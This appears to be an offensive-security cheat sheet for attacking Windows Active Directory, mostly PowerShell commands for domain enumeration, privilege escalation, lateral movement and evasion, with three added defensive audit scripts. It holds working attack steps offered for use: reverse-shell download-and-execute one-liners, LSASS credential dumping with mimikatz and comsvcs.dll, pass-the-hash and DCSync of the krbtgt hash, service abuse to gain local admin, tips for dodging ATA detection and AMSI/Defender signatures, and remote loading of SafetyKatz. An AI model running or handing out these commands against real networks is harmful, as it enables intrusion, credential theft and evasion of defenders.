OFFSECVAULT
Domain Enumeration | PowerShell
using two tools [PowerView / ADModule]
- ADModule | Active Directory PowerShell module | domain enumeration
- BloodHound
- PowerView
- SharpView
::: get current domain
PS> Get-Domain      # PowerView
PS> Get-ADDomain    # Active Directory module
::: get object of another domain
PS> Get-Domain -Domain
PS> Get-ADDomain -Identity
::: get domain SID for the current domain
PS> Get-DomainSID
PS> (Get-ADDomain).DomainSID
::: get domain policy for current domain
PS> Get-DomainPolicyData
PS> Get-DomainPolicy
PS> (Get-DomainPolicyData).systemaccess
::: get domain policy for another domain
PS> (Get-DomainPolicyData -Domain ).systemaccess
::: get domain controller for the current domain
PS> Get-DomainController
PS> Get-ADDomainController
::: get domain controller for another domain
PS> Get-DomainController -Domain
PS> Get-ADDomainController -DomainName -Discover
::: get list of users in current domain
PS> Get-DomainUser
PS> Get-DomainUser -Identity
PS> Get-ADUser -Filter * -Properties *
PS> Get-ADUser -Identity -Properties *
::: get list of user names and their count
PS> Get-DomainUser | select samaccountname | measure
::: get list of properties of a user in current domain
PS> Get-DomainUser -Identity -Properties *
PS> Get-DomainUser -Properties samaccountname,logonCount    # logon counts help to establish what normal user activity looks like
PS> Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
PS> Get-ADUser -Filter * -Properties * | select name,logoncount,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
::: search for a string in a user's attribute
PS> Get-DomainUser -LDAPFilter "Description=*STRING*" | select name,Description
PS> Get-ADUser -Filter 'Description -like "*STRING*"' -Properties Description | select name,Description
::: get a list of computers in the current domain
PS> Get-DomainComputer | select Name
PS> Get-DomainComputer -OperatingSystem "*Server 2016*"
PS> Get-DomainComputer -Ping
PS> Get-ADComputer -Filter * | select Name
PS> Get-ADComputer -Filter * -Properties *
PS> Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem
PS> Get-ADComputer -Filter * -Properties DNSHostname | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
::: get all groups in the current domain
PS> Get-DomainGroup | select Name
PS> Get-DomainGroup -Domain
PS> Get-ADGroup -Filter * | select Name
PS> Get-ADGroup -Filter * -Properties *
::: get all groups containing the word "admin" in group name
PS> Get-DomainGroup *admin*
PS> Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
::: get all members of the domain admin group
PS> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
PS> Get-ADGroupMember -Identity "Domain Admins" -Recursive
::: get the group membership for a user
PS> Get-DomainGroup -UserName ""
PS> Get-ADPrincipalGroupMembership -Identity
::: list all local groups on a machine (need admin rights on non-dc machines)
PS> Get-NetLocalGroup -ComputerName -ListGroups
::: get members of all the local groups on a machine (need admin rights on non-dc machines)
PS> Get-NetLocalGroup -ComputerName -Recurse
::: get members of all the local group "Administrators" on a machine (need admin rights on non-dc machines)
PS> Get-NetLocalGroupMember -ComputerName -GroupName Administrators
::: get actively logged users on a computer (need local admin rights on the target)
PS> Get-NetLoggedon -ComputerName
::: get locally logged users on a computer (need remote registry on the target - started by default on server OS)
PS> Get-LoggedonLocal -ComputerName
::: get the last logged-on user on a computer (need admin rights and remote registry on the target)
PS> Get-LastLoggedOn -ComputerName
::: find shares on hosts in current domain
PS> Invoke-ShareFinder -Verbose
::: find sensitive files on computers in the domain
PS> Invoke-FileFinder -Verbose
::: get all fileservers of the domain
PS> Get-NetFileServer
::: get kerberos policy
PS> (Get-DomainPolicy).KerberosPolicy
::: get admin groups of another domain in the forest
PS> Get-DomainGroup *admin* -domain | select samaccountname
-GPO-
::: get list of GPO in current domain
PS> Get-DomainGPO
PS> Get-DomainGPO -ComputerIdentity
::: get GPOs that use Restricted Groups or groups.xml to set local group membership (interesting users)
PS> Get-DomainGPOLocalGroup
::: get users that are placed in a local group of a machine through GPO
PS> Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity
::: get machines where the given user is member of a specific group
PS> Get-DomainGPOUserLocalGroupMapping -Identity -Verbose
-OU-
::: get OU in a domain
PS> Get-DomainOU
PS> Get-ADOrganizationalUnit -Filter * -Properties *
::: get the GPO applied on an OU; read the GPO name from the gplink attribute returned by Get-NetOU / Get-DomainOU
PS> Get-DomainGPO -Identity "gplink/cn"
sample:
PS> Get-DomainGPO -Identity {00000000-0000-0000-0000-000000000000}
::: get attribute of an OU
PS> (Get-DomainOU -Identity ).attribute
sample:
PS> (Get-DomainOU -Identity Servers).gplink
::: show only the name of each result
PS> Get-DomainOU | select -ExpandProperty name
::: list all computers in a specific OU
PS> (Get-DomainOU -Identity [OUName]).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name
-ACL-
::: enumerate ACL for domain admin group
to enumerate another domain group, change the -Identity value
PS> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs -Verbose
::: get ACL associated with the specified object
PS> Get-DomainObjectAcl -SamAccountName -ResolveGUIDs
::: get ACLs under the specified search base (prefix used for the search)
PS> Get-DomainObjectAcl -SearchBase "STRING" -ResolveGUIDs -Verbose
::: enumerate ACLs using the ActiveDirectory module, by object DN
PS> (Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access
::: search for interesting ACEs
PS> Find-InterestingDomainAcl -ResolveGUIDs
::: get ACL associated with specified path
PS> Get-PathAcl -Path "\\\sysvol"
::: show current ACL for a specific user
PS> Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -eq ""}
note: ?{$_.IdentityReferenceName -eq ""} is Where-Object shorthand; put the user or group name inside the quotes to keep only that principal's ACEs
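The ACL commands above list who holds rights on an object; from the defender's side the same data is reviewed to find principals that should not be able to control a high-value group. The following is an added example, not code from the original notes or from PowerView: it takes the Access collection that (Get-Acl 'AD:\<DN>').Access returns and reports any allowed ACE whose trustee is outside an expected allow-list and whose rights include a take-over right. The domain name 'CORP', the $ExpectedPrincipals list and the sample ACEs are constructed and must be adjusted to the real environment.

```powershell
# Added example, not from the original notes: review the ACEs on an AD object
# (the Access collection returned by (Get-Acl 'AD:\<DN>').Access) and report
# principals outside an expected allow-list that hold control rights.
# 'CORP' and the sample ACEs below are constructed; adjust to the real domain.

# Rights that let the holder take over the object or its membership
$ControlRights = 'GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner', 'WriteProperty', 'ExtendedRight'

# Principals expected to control a high-value group such as Domain Admins
$ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM'
    'BUILTIN\Administrators'
    'CORP\Domain Admins'
    'CORP\Enterprise Admins'
)

function Get-UnexpectedControlAce {
    param(
        [Parameter(Mandatory)][object[]]$Access,
        [string[]]$Expected = $ExpectedPrincipals
    )
    foreach ($ace in $Access) {
        # Deny entries are not take-over paths
        if ([string]$ace.AccessControlType -ne 'Allow') { continue }
        $id = [string]$ace.IdentityReference
        if ($id -in $Expected) { continue }
        # ActiveDirectoryRights is a flags enum; its string form is comma separated
        $rights = ([string]$ace.ActiveDirectoryRights) -split ',\s*'
        $hits = @($rights | Where-Object { $_ -in $ControlRights })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Identity   = $id
                Rights     = $hits -join ','
                Inherited  = $ace.IsInherited
                ObjectType = $ace.ObjectType   # attribute/right GUID; all zeros = whole object
            }
        }
    }
}

# Constructed sample ACEs (not from a real directory); the GUID on the
# helpdesk entry is the schema GUID of the "member" attribute
$SampleAces = @(
    [pscustomobject]@{ IdentityReference = 'NT AUTHORITY\SYSTEM'; ActiveDirectoryRights = 'GenericAll'; AccessControlType = 'Allow'; IsInherited = $false; ObjectType = '00000000-0000-0000-0000-000000000000' }
    [pscustomobject]@{ IdentityReference = 'CORP\Domain Admins'; ActiveDirectoryRights = 'GenericAll'; AccessControlType = 'Allow'; IsInherited = $false; ObjectType = '00000000-0000-0000-0000-000000000000' }
    [pscustomobject]@{ IdentityReference = 'CORP\helpdesk'; ActiveDirectoryRights = 'ReadProperty, WriteProperty'; AccessControlType = 'Allow'; IsInherited = $false; ObjectType = 'bf9679c0-0de6-11d0-a285-00aa003049e2' }
    [pscustomobject]@{ IdentityReference = 'NT AUTHORITY\Authenticated Users'; ActiveDirectoryRights = 'GenericRead'; AccessControlType = 'Allow'; IsInherited = $true; ObjectType = '00000000-0000-0000-0000-000000000000' }
    [pscustomobject]@{ IdentityReference = 'CORP\svc-backup'; ActiveDirectoryRights = 'WriteDacl'; AccessControlType = 'Deny'; IsInherited = $false; ObjectType = '00000000-0000-0000-0000-000000000000' }
)

Get-UnexpectedControlAce -Access $SampleAces | Format-Table -AutoSize
```

For a real review, replace $SampleAces with (Get-Acl 'AD:\CN=Domain Admins,CN=Users,DC=...').Access (AD module loaded) and put the real domain's admin groups in $ExpectedPrincipals. Only the helpdesk entry in the sample should be reported: WriteProperty on the member attribute lets that principal change group membership, while the Deny entry and the read-only entry are skipped.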
-TRUSTS-
A trust is a relationship between two domains or forests which allows users of one domain or forest to
access resources in the other domain or forest.
Trusts can be automatic (parent-child, same forest, etc.) or established manually (forest, external).
TDO / Trusted Domain Objects represent the trust relationship in a domain.
::: get list of all domain trusts for the current domain
PS> Get-DomainTrust
PS> Get-DomainTrust -Domain
PS> Get-ADTrust
PS> Get-ADTrust -Identity
::: list all trusts of the current forest (AD module)
PS> Get-ADForest | %{Get-ADTrust -Filter *}
::: list external trusts of the current domain (SID filtering enabled / not intra-forest)
PS> Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
PS> Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)'
::: list external trusts in the current forest
PS> Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq "FILTER_SIDS"}
PS> (Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}
::: map trusts of a forest
PS> Get-ForestTrust
PS> Get-ForestTrust -Forest
PS> Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'
::: map trusts of current domain
PS> Get-ADTrust -Filter *
::: map trusts of external trust
PS> Get-ADTrust -Filter * -Server
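The FILTER_SIDS value used in the trust filters above is PowerView's name for one bit of the trustAttributes mask; Get-ADTrust returns the raw integer. The block below is an added example, not code from the original notes or from the AD module: it decodes the mask with the bit values from the MS-ADTS trustAttributes definition and flags trusts a defender would review (external trusts without SID filtering, forest trusts relaxed to external-style filtering, RC4 use). Get-TrustReviewReport runs against the real directory; the values fed to the functions at the end are constructed samples.

```powershell
# Added example, not from the original notes: decode the TrustAttributes bit
# mask that Get-ADTrust returns and flag trusts worth reviewing. Bit values
# follow the MS-ADTS trustAttributes definition; PowerView's FILTER_SIDS is the
# QUARANTINED_DOMAIN bit (0x4). The sample values at the end are constructed.

$TrustAttributeFlags = @(
    @{ Bit = 0x001; Name = 'NON_TRANSITIVE' }
    @{ Bit = 0x002; Name = 'UPLEVEL_ONLY' }
    @{ Bit = 0x004; Name = 'QUARANTINED_DOMAIN' }      # SID filtering (quarantine) enforced
    @{ Bit = 0x008; Name = 'FOREST_TRANSITIVE' }
    @{ Bit = 0x010; Name = 'CROSS_ORGANIZATION' }
    @{ Bit = 0x020; Name = 'WITHIN_FOREST' }
    @{ Bit = 0x040; Name = 'TREAT_AS_EXTERNAL' }       # forest trust relaxed to external-style SID filtering
    @{ Bit = 0x080; Name = 'USES_RC4_ENCRYPTION' }
    @{ Bit = 0x200; Name = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION' }
)

function ConvertFrom-TrustAttributes {
    param([int]$Value)
    $names = @(foreach ($f in $TrustAttributeFlags) { if ($Value -band $f.Bit) { $f.Name } })
    return ,$names
}

function Test-TrustNeedsReview {
    param([int]$Attributes)
    $flags = ConvertFrom-TrustAttributes -Value $Attributes
    $findings = @()
    $isForestTrust = 'FOREST_TRANSITIVE' -in $flags
    $isExternal    = ('WITHIN_FOREST' -notin $flags) -and (-not $isForestTrust)
    if ($isExternal -and 'QUARANTINED_DOMAIN' -notin $flags) {
        $findings += 'external trust without SID filtering (quarantine)'
    }
    if ($isForestTrust -and 'TREAT_AS_EXTERNAL' -in $flags) {
        $findings += 'forest trust treated as external (SID filtering relaxed)'
    }
    if ('USES_RC4_ENCRYPTION' -in $flags) {
        $findings += 'trust flagged to use RC4 encryption'
    }
    return ,$findings
}

function Get-TrustReviewReport {
    param([string]$Server)   # optional: query another domain's DC
    $params = @{ Filter = '*' }
    if ($Server) { $params.Server = $Server }
    Get-ADTrust @params | ForEach-Object {
        [pscustomobject]@{
            Name      = $_.Name
            Direction = $_.Direction
            Flags     = (ConvertFrom-TrustAttributes $_.TrustAttributes) -join ','
            Findings  = (Test-TrustNeedsReview $_.TrustAttributes) -join '; '
        }
    }
}

# Constructed sample masks: 0x0 external/no quarantine, 0x4 external/quarantined,
# 0x8 forest trust, 0x48 forest trust treated as external, 0x20 within forest
foreach ($v in 0x0, 0x4, 0x8, 0x48, 0x20) {
    [pscustomobject]@{
        Value    = ('0x{0:x}' -f $v)
        Flags    = (ConvertFrom-TrustAttributes $v) -join ','
        Findings = (Test-TrustNeedsReview $v) -join '; '
    }
}
```

Run Get-TrustReviewReport with the AD module loaded to get the same columns for every real trust; pass -Server with a DC of another domain to cover each domain of the forest, as the Get-ForestDomain / (Get-ADForest).Domains loops above do.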
-FOREST-
::: get details about the current forest
PS> Get-Forest
PS> Get-Forest -Forest
PS> Get-ADForest
PS> Get-ADForest -Identity
::: get all domains in the current forest
PS> Get-ForestDomain
PS> Get-ForestDomain -Forest
PS> (Get-ADForest).Domains
::: get all global catalogs for the current forest
PS> Get-ForestGlobalCatalog
PS> Get-ForestGlobalCatalog -Forest
PS> Get-ADForest | select -ExpandProperty GlobalCatalogs
-USER HUNTING-
::: get list of computers
PS> Get-NetComputer
::: find machines on the current domain where the current user has local admin access
PS> Find-LocalAdminAccess -Verbose
::: check if a computer has local admin access or not
PS> Get-NetComputer | Invoke-CheckLocalAdminAccess
::: find computers where a domain admin (or specified user/group) has sessions
PS> Find-DomainUserLocation -Verbose
PS> Find-DomainUserLocation -UserGroupIdentity ""
::: find computers where a domain admin session is available and current user has admin access
PS> Find-DomainUserLocation -CheckAccess
::: find computers (file servers and distributed file servers) where a domain admin session is available.
PS> Find-DomainUserLocation -Stealth
-PRIVILEGE ESCALATION-
Tools: PowerUp
ways of escalation:
- missing patches
- automated deployment and AutoLogon passwords in clear text
- AlwaysInstallElevated (any user can run MSI as SYSTEM)
- misconfigured services
- DLL hijacking and more
- NTLM relaying a.k.a. "Won't Fix"
-PRIVESC LOCAL-
::: get services filepath
PS> Get-WmiObject -Class win32_service | select pathname
note: when checking service paths, double check the entire path and whether it is unquoted.
a service path can be abused if it is unquoted and contains spaces.
::: how to get security descriptors
PS> sc.exe sdshow
PS> sc.exe sdshow alg
PS> sc.exe sdshow snmptrap
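The unquoted-path check above is the same one an administrator runs to harden a host. The following is an added example, not code from the original notes or from PowerUp: it inspects Win32_Service over CIM, flags services whose unquoted executable path contains a space, and emits the sc.exe command that quotes the path (the fix). Function names, the optional -ComputerName parameter and the sample paths at the end are my own constructions.

```powershell
# Added example, not from the original notes: audit Win32 services for
# unquoted binary paths that contain spaces and print the sc.exe command that
# fixes each one. Runs against the local host, or a remote host over CIM when
# -ComputerName is given. The sample paths at the end are constructed.

function Test-UnquotedServicePath {
    param([string]$PathName)
    $p = ([string]$PathName).Trim()
    if (-not $p) { return $false }
    # A path that starts with a quote is delimited; no ambiguity for CreateProcess
    if ($p.StartsWith('"')) { return $false }
    # Only the executable part (up to and including ".exe") matters;
    # arguments after it may legitimately contain spaces
    $exeEnd  = $p.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
    $exePart = if ($exeEnd -ge 0) { $p.Substring(0, $exeEnd + 4) } else { $p }
    return [bool]($exePart -match '\s')
}

function Get-UnquotedServiceFix {
    param([string]$Name, [string]$PathName)
    $p = $PathName.Trim()
    $exeEnd = $p.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
    $exe  = if ($exeEnd -ge 0) { $p.Substring(0, $exeEnd + 4) } else { $p }
    $rest = if ($exeEnd -ge 0) { $p.Substring($exeEnd + 4) } else { '' }
    # sc.exe needs the space after "binPath=" and escaped quotes around the executable
    return ('sc.exe config "{0}" binPath= "\"{1}\"{2}"' -f $Name, $exe, $rest)
}

function Find-UnquotedServicePath {
    param([string]$ComputerName)
    $services = if ($ComputerName) {
        Get-CimInstance -ClassName Win32_Service -ComputerName $ComputerName
    } else {
        Get-CimInstance -ClassName Win32_Service
    }
    foreach ($svc in $services) {
        if (Test-UnquotedServicePath -PathName $svc.PathName) {
            [pscustomobject]@{
                Service   = $svc.Name
                StartName = $svc.StartName
                PathName  = $svc.PathName
                Fix       = Get-UnquotedServiceFix -Name $svc.Name -PathName $svc.PathName
            }
        }
    }
}

# Constructed sample paths exercising the check (not from a real host)
$SamplePaths = @(
    'C:\Windows\system32\svchost.exe -k netsvcs'
    '"C:\Program Files\Vendor\Agent\agent.exe" -service'
    'C:\Program Files\Vendor\Agent\agent.exe -service'
    'C:\Program Files (x86)\Other Vendor\updater.exe'
)
foreach ($path in $SamplePaths) {
    [pscustomobject]@{ PathName = $path; Unquoted = (Test-UnquotedServicePath -PathName $path) }
}

# Real audit of the local host
Find-UnquotedServicePath | Format-Table -AutoSize
```

Only the third and fourth sample paths are unquoted with a space in the executable part; the first has no space before .exe and the second is already quoted. The Fix column is meant to be reviewed and then run from an elevated prompt, since sc.exe config needs rights on the service.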
POWERUP USAGE
::: import the tool PowerUp
1. import InviShell
2. . /path/to/file/PowerUp.ps1
::: get services with unquoted paths and a space in their name
PS> Get-ServiceUnquoted -Verbose
::: get services where the current user can write to its binary path or change arguments to the binary
PS> Get-ModifiableServiceFile -Verbose
::: get the services whose configuration the current user can modify
PS> Get-ModifiableService -Verbose
::: abuse "Get-ModifiableService" results to add our current domain user to the local "Administrators" group
PS> Invoke-ServiceAbuse -Name '' -UserName ''
note: this gives the user local admin rights. to complete the abuse, once the configuration
change is done, log off and log on again.
::: get computers where the added user has local administrative access
Find-PSRemotingLocalAdminAccess.ps1 tool usage (PowerShell Remoting)
* import InviShell and import the module [Find-PSRemotingLocalAdminAccess.ps1]
PS> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS> Find-PSRemotingLocalAdminAccess
note: any computer in the output is one where the added user has admin rights.
::: how to connect to the computer using "winrs" as the student user
PS> winrs -r: cmd
PS> whoami
PS> hostname
::: how to connect to the computer using PowerShell Remoting
PS> Enter-PSSession -ComputerName
::: create encoded reverse shell using "Invoke-PowerShellTcp.ps1"
note: the file "Invoke-PowerShellTcp.ps1" needs to be hosted on a local web server.
PS> powershell.exe iex (iwr http:///Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress -Port
or
PS> powershell.exe -c iex ((New-Object Net.WebClient).DownloadString('http:///Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress -Port 443
::: download a file locally
PS> iex (iwr http:///path/to/file -UseBasicParsing)
PS> iex ((New-Object Net.webClient).DownloadString('http:///path/to/file'))
-BLOODHOUND-
bloodhound tool usage:
import SharpHound.ps1
PS> . C:\path\to\file\SharpHound.ps1
PS> Invoke-BloodHound -CollectionMethod All -Verbose
to avoid detections like ATA, exclude domain controllers [-ExcludeDC]
PS> Invoke-BloodHound -CollectionMethod All -ExcludeDC
-LATERAL MOVEMENT-
powershell remoting
ONE-TO-ONE | ONE-TO-MANY
::: store a session or new session in a variable
PS> $[variable_name] = New-PSSession -ComputerName [hostname]
PS> $b0ydC = New-PSSession -ComputerName ofsv-001
::: one to one
PSSession
- interactive
- runs in a new process (wsmprovhost)
- stateful
PS> New-PSSession
PS> Enter-PSSession
::: one to many
- non-interactive
- executes commands in parallel
PS> Invoke-Command
::: use to execute commands or scriptblock
PS> Invoke-Command -ScriptBlock {Get-Process} -ComputerName (Get-Content )
PS> Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName (cat C:\path\to\hosts.txt)
::: use to execute script from file
PS> Invoke-Command -FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content )
::: execute locally loaded function on the remote machines
PS> Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content )
::: execute "Stateful" commands using Invoke-Command
PS> $Sess = New-PSSession -ComputerName
PS> Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
PS> Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}
-LATERAL MOVEMENT : MIMIKATZ | EXTRACTING CREDENTIALS FROM LSASS-
::: dump credentials on a local machine using mimikatz
PS> Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
::: using safetykatz (minidump of lsass and PELoader to run mimikatz)
PS> SafetyKatz.exe "sekurlsa::ekeys"
::: dump credentials using sharpkatz (C# port of some of mimikatz functionality)
PS> SharpKatz.exe --Command ekeys
::: dump credentials using Dumpert (direct system calls and API unhooking)
PS> rundll32.exe C:\Dumpert\Outflank-Dumpert.dll, Dump
::: dump using pypykatz (mimikatz functionality in Python)
PS> pypykatz.exe live lsa
::: dump using comsvcs.dll
PS> tasklist /FI "IMAGENAME eq lsass.exe"
PS> rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump C:\Users\Public\lsass.dmp full
-LATERAL MOVEMENT: MIMIKATZ | OVER PASS THE HASH-
pass the hash = NTLM || over pass the hash = Kerberos
::: over pass the hash generates tokens from hashes or keys | needs elevation, run as admin
- mimikatz
PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256: /run:powershell.exe"'
- safetyKatz
PS> SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256: /run:cmd.exe" "exit"
::: rubeus.exe Usage
- NO elevation required
PS> rubeus.exe asktgt /user:administrator /rc4: /ptt
- elevation required
PS> Rubeus.exe asktgt /user:Administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
-LATERAL MOVEMENT : MIMIKATZ | DCSync-
::: use the DCSync feature to get the krbtgt hash
both require admin privileges
PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:us\krbtgt"'
PS> SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt" "exit"
-Offensive .NET - Tradecraft | AV bypass-
like AMSI Trigger, there is Defender Check for Windows Defender.
the approach is the same as previously with AMSI: where a signature is detected, the code needs to be obfuscated to bypass it.
minimal changes to the matched strings help.
tool: Defender Check
-Offensive .NET - Tradecraft | String Manipulation-
- minimal changes to the code help to bypass this
- remember to check the code against tools like AMSI Trigger, Defender Check, etc.
- download the latest version of Mimikatz and Out-CompressedDll.ps1
--> run the Out-CompressedDll.ps1 PowerShell script on the Mimikatz binary and save the output to a file.
PS> Out-CompressedDll > outputfilename.txt
-Offensive .NET - Tradecraft | AV bypass - Obfuscation-
::: obfuscate the complete binary
tool: Confuser Ex
-Offensive .NET - Tradecraft | Payload Delivery-
NetLoader
it can be used to load a binary from a file path or URL and patch AMSI & ETW while executing.
PS> C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe
there is also AssemblyLoad.exe, which loads NetLoader in memory from a URL; NetLoader then loads a binary from a file path or URL.
PS> C:\Users\Public\AssemblyLoad.exe http://192.168.100.X/Loader.exe -path http://192.168.100.X/SafetyKatz.exe